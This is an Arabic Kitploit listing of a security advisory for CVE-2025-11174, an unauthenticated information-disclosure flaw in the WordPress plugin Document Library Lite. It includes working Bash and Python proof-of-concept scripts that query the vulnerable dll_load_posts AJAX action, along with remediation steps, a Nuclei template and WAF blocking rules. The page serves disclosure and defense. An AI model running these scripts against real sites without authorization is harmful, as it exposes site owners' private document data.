Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-11174 — Document Library Lite <= 1.1.6 - غياب التفويض لكشف المعلومات الحساسة | CVE-2025-11174 | Kitploit
أدوات/GitHubGitHub/snailsploit/cve-2025-11174
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتأمن الويباختبار الاختراق
GitHubsnailsploit/cve-2025-11174

CVE-2025-11174

Document Library Lite <= 1.1.6 - غياب التفويض لكشف المعلومات الحساسة | CVE-2025-11174

عرض المستودع
2منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-11174: كشف معلومات غير مصادق عليه في إضافة Document Library Lite لووردبريس

CVE CVSS Score WordPress Plugin CWE-862 Wordfence

الكلمات المفتاحية: CVE-2025-11174، ثغرة Document Library Lite، كشف المعلومات، أمن ووردبريس، استغلال AJAX غير مصادق عليه، ثغرة إضافة ووردبريس، CWE-862، أمن إضافة مستندات ووردبريس، تجاوز التفويض، ووردبريس CVE 2025

Table of Contents

  • نظرة عامة
  • تفاصيل الثغرة
  • التحليل الفني
  • متجه الهجوم
  • إثبات المفهوم
  • دليل المعالجة
  • الكشف
  • مقاييس CVSS
  • المراجع
  • الاعتمادات
  • جهة الاتصال الأمنية
  • نظرة عامة

    ثغرة كشف المعلومات في إضافة Document Library Lite لووردبريس (CVE-2025-11174) - خلل أمني يتيح الوصول غير المصادق عليه إلى بيانات المستندات الحساسة في إضافة مكتبة المستندات لووردبريس.

    تم اكتشاف ثغرة تجاوز تفويض حرجة في إضافة Document Library Lite لووردبريس تتيح للمهاجمين غير المصادق عليهم الوصول إلى معلومات المستندات الحساسة دون مصادقة سليمة.

    اكتشفها: Kai Aizen و Avraham Shemesh (SnailSploit)
    تاريخ النشر: 1 نوفمبر 2025
    درجة CVSS: 5.3 (متوسطة)
    CWE: CWE-862 - فقدان التفويض
    الإضافة: Document Library Lite
    البائع: Barn2 Plugins
    نوع الهجوم: كشف معلومات غير مصادق عليه
    الصلاحيات المطلوبة: لا شيء (هجوم غير مصادق عليه)

    تفاصيل الثغرة

    الوصف

    إضافة Document Library Lite لووردبريس تحتوي على ثغرة تفويض غير سليمة في جميع الإصدارات حتى 1.1.6 وما دون. تُعرّض الإضافة إجراء AJAX غير مصادق عليه dll_load_posts يعيد جدول JSON من بيانات المستندات دون إجراء فحوصات nonce أو فحوصات الصلاحيات.

    التأثير

    تتيح هذه الثغرة للمهاجمين غير المصادق عليهم:

    • الوصول إلى بيانات تعريف المستندات دون تفويض
    • استرجاع قوائم المستندات التي يجب أن تكون مقيدة
    • عرض معلومات المستندات المخصصة للمستخدمين المصادق عليهم فقط
    • تعداد المستندات المخزنة في مكتبة المستندات

    ملاحظة: تعكس درجة CVSS البالغة 5.3 (شدة متوسطة) كشف معلومات محدودًا. بينما تتيح الثغرة وصولًا غير مصادق عليه إلى بيانات المستندات، فإن التأثير يُقيَّم على أنه منخفض للسرية دون أي تأثير على السلامة أو التوفر.

    الإصدارات المتأثرة

    • الضعيفة: جميع الإصدارات ≤ 1.1.6
    • المصححة: الإصدار 1.1.7 فما فوق

    مقاييس CVSS v3.1

    root@kitploit:~
    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    
    المقياسالقيمة
    متجه الهجومالشبكة (AV:N)
    تعقيد الهجوممنخفض (AC:L)
    الصلاحيات المطلوبةلا شيء (PR:N)
    تفاعل المستخدملا شيء (UI:N)
    النطاقغير متغير (S:U)
    السريةمنخفضة (C:L)
    السلامةلا شيء (I:N)
    التوفرلا شيء (A:N)

    تفصيل CVSS v3.1:

    • متجه الهجوم (AV): الشبكة - يمكن استغلال الثغرة عن بُعد عبر الشبكة
    • تعقيد الهجوم (AC): منخفض - لا تتطلب الاستغلال أي شروط خاصة
    • الصلاحيات المطلوبة (PR): لا شيء - لا تتطلب أي مصادقة أو صلاحيات
    • تفاعل المستخدم (UI): لا شيء - يعمل الاستغلال دون أي تفاعل من المستخدم
    • النطاق (S): غير متغير - تؤثر الثغرة فقط على المكوّن الضعيف
    • تأثير السرية (C): منخفض - كشف معلومات محدود
    • تأثير السلامة (I): لا شيء - لا يوجد تأثير على السلامة
    • تأثير التوفر (A): لا شيء - لا يوجد تأثير على التوفر

    التحليل الفني

    السبب الجذري للثغرة

    يتم تسجيل إجراء AJAX dll_load_posts دون فحوصات مصادقة أو تفويض سليمة:

    root@kitploit:~
    // Vulnerable code pattern (simplified)
    add_action('wp_ajax_nopriv_dll_load_posts', 'dll_load_posts_callback');
    

    تشير البادئة wp_ajax_nopriv_ إلى أن هذا الإجراء متاح للمستخدمين غير المصادق عليهم، ولا تنفذ دالة الاستدعاء ما يلي:

    • التحقق من nonce
    • فحوصات الصلاحيات
    • التحقق من مصادقة المستخدم

    متجه الهجوم

    root@kitploit:~
    POST /wp-admin/admin-ajax.php
    action=dll_load_posts
    

    يمكن استغلال الثغرة عبر نقطة نهاية admin-ajax.php في ووردبريس دون مصادقة.

    إثبات المفهوم

    ⚠️ لأغراض التعليم والاختبار المصرح به فقط

    إثبات المفهوم بلغة Bash

    root@kitploit:~
    #!/bin/bash
    # CVE-2025-11174 PoC
    
    TARGET_URL="$1"
    
    if [ -z "$TARGET_URL" ]; then
        echo "Usage: $0 <target_url>"
        echo "Example: $0 https://example.com"
        exit 1
    fi
    
    echo "[*] CVE-2025-11174 - Document Library Lite Information Disclosure PoC"
    echo "[*] Target: $TARGET_URL"
    echo ""
    
    # Send request to vulnerable AJAX endpoint
    curl -s -X POST "$TARGET_URL/wp-admin/admin-ajax.php" \
      -H "Content-Type: application/x-www-form-urlencoded" \
      -d "action=dll_load_posts" \
      | python3 -m json.tool
    
    echo ""
    echo "[+] If you see document data above, the site is vulnerable!"
    

    إثبات المفهوم بلغة Python

    root@kitploit:~
    #!/usr/bin/env python3
    """
    CVE-2025-11174 - Document Library Lite Information Disclosure PoC
    For educational and authorized testing purposes only
    """
    
    import requests
    import sys
    import json
    
    def exploit(target_url):
        ajax_url = f"{target_url.rstrip('/')}/wp-admin/admin-ajax.php"
        
        print(f"[*] CVE-2025-11174 - Document Library Lite PoC")
        print(f"[*] Target: {target_url}")
        print(f"[*] AJAX Endpoint: {ajax_url}\n")
        
        data = {'action': 'dll_load_posts'}
        
        try:
            response = requests.post(ajax_url, data=data, timeout=10)
            
            if response.status_code == 200:
                print("[+] Request successful!\n")
                try:
                    json_data = response.json()
                    print("[+] Retrieved document data:")
                    print(json.dumps(json_data, indent=2))
                    print("\n[!] Site is VULNERABLE to CVE-2025-11174")
                except json.JSONDecodeError:
                    print("[-] No JSON response received")
                    print(f"Response: {response.text[:200]}")
            else:
                print(f"[-] Request failed with status code: {response.status_code}")
                
        except requests.RequestException as e:
            print(f"[-] Error: {e}")
    
    if __name__ == "__main__":
        if len(sys.argv) != 2:
            print(f"Usage: {sys.argv[0]} <target_url>")
            print(f"Example: {sys.argv[0]} https://example.com")
            sys.exit(1)
        
        target = sys.argv[1]
        exploit(target)
    

    المعالجة

    لمسؤولي المواقع

    إجراء فوري مطلوب:

    1. حدّث إلى الإصدار 1.1.7 أو أحدث من Document Library Lite فورًا
    2. راجع سجلات الوصول لموقعك بحثًا عن طلبات POST مشبوهة إلى admin-ajax.php مع action=dll_load_posts
    3. إذا لم تستطع التحديث فورًا، ففكر في تعطيل الإضافة مؤقتًا

    تعليمات التحديث

    عبر لوحة تحكم ووردبريس:

    1. انتقل إلى Plugins > Installed Plugins في لوحة تحكم ووردبريس
    2. حدد "Document Library Lite"
    3. انقر Update Now للترقية إلى الإصدار 1.1.7 أو أحدث
    4. تحقق من نجاح التحديث

    باستخدام WP-CLI:

    root@kitploit:~
    wp plugin update document-library-lite
    

    لمطوّري الإضافات

    تأكد من أن جميع معالجات AJAX تنفذ ضوابط أمنية سليمة:

    root@kitploit:~
    // Example of proper AJAX security
    add_action('wp_ajax_dll_load_posts', 'dll_load_posts_callback');
    
    function dll_load_posts_callback() {
        // Verify nonce
        if (!wp_verify_nonce($_POST['nonce'], 'dll_nonce')) {
            wp_die('Invalid nonce');
        }
        
        // Check capabilities
        if (!current_user_can('read')) {
            wp_send_json_error('Insufficient permissions');
            wp_die();
        }
        
        // Your secure code here
    }
    

    الكشف

    فحص إضافة ووردبريس

    root@kitploit:~
    # Check if vulnerable version is installed
    wp plugin list | grep -i "document-library-lite"
    

    قواعد الماسح الأمني

    قالب Nuclei:

    root@kitploit:~
    id: CVE-2025-11174
    
    info:
      name: Document Library Lite - Unauthenticated Information Disclosure
      author: security-research
      severity: medium
      description: Document Library Lite plugin for WordPress is vulnerable to information disclosure
      reference:
        - https://github.com/[your-repo]/CVE-2025-11174
      tags: cve,cve2025,wordpress,wp-plugin,unauth
    
    requests:
      - method: POST
        path:
          - "{{BaseURL}}/wp-admin/admin-ajax.php"
        
        body: "action=dll_load_posts"
        
        matchers-condition: and
        matchers:
          - type: word
            words:
              - "data"
              - "recordsTotal"
            condition: and
          
          - type: status
            status:
              - 200
    

    قواعد جدار حماية تطبيقات الويب

    قاعدة ModSecurity:

    root@kitploit:~
    SecRule REQUEST_URI "@contains /wp-admin/admin-ajax.php" \
        "chain,id:1000001,phase:2,t:none,t:urlDecodeUni,t:normalizePathWin,\
        log,deny,status:403,msg:'CVE-2025-11174 Exploit Attempt'"
        SecRule ARGS:action "@streq dll_load_posts" "t:none"
    

    قاعدة Nginx/OpenResty:

    root@kitploit:~
    if ($request_uri ~* "admin-ajax\.php") {
        if ($args ~* "action=dll_load_posts") {
            return 403;
        }
    }
    

    الجدول الزمني

    • 1 نوفمبر 2025 - تم الإفصاح عن الثغرة علنًا
    • 1 نوفمبر 2025 - تم نشر سجل CVE
    • نوفمبر 2025 - تم إصدار التصحيح (الإصدار 1.1.7)

    المراجع

    • CVE-2025-11174 - CVE.org
    • قاعدة بيانات GitHub الاستشارية
    • Wordfence Intelligence
    • دليل إضافات ووردبريس

    الاعتمادات

    الباحثون:

    • Avraham Shemesh
    • Kai Aizen - SnailSploit

    عملية الإفصاح: إفصاح منسق

    إخلاء مسؤولية

    تُقدَّم هذه المعلومات لأغراض البحث الأمني والدفاع فقط. أي استغلال لهذه الثغرة لأغراض خبيثة هو أمر غير قانوني وغير أخلاقي. احصل دائمًا على إذن مناسب قبل اختبار أنظمة لا تملكها.

    الاتصال

    للاستفسارات أو معلومات إضافية حول هذه الثغرة:

    • البريد الإلكتروني: [email protected]
    • الموقع الإلكتروني: snailsploit.com
    • المؤسسة: SnailSploit Security Research

    آخر تحديث: 2 نوفمبر 2025


    📚 التوثيق والمؤلف

    يوجد الشرح الكامل لهذا المشروع، والمنهجية، والأبحاث ذات الصلة في:

    https://snailsploit.com/security-research/cves/cve-2025-11174/

    أُنشئ بواسطة Kai Aizen — باحث أمني هجومي مستقل.

    snailsploit.com · Research · Frameworks · GitHub · LinkedIn · ResearchGate · X/Twitter

    نفس الهجوم. ركيزة مختلفة.

    تنزيل الأداة